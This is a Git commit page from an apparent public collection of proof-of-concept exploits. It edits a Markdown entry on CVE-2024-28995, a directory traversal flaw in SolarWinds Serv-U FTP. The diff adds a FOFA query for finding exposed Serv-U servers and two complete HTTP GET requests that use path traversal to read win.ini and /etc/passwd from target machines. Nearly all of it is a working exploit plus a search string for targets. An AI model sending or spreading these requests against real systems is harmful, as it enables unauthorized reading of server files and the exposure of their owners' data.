admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

修改数据包

Browse Source
This commit is contained in:
wy876 2024-06-15 00:33:31 +08:00
parent 1d29022cc3
commit 4fe572e1a5
1 changed files with 15 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
View File

@ -7,14 +7,26 @@ CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞攻击者
## fofa ## fofa
``` ```
app="SolarWinds-Serv-U-FTP" server="Serv-U"
``` ```
## poc ## poc
``` ```
GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1 GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: Host: xx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
```
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
``` ```
![image-20240614211748043](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406142117114.png) ![image-20240614211748043](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406142117114.png)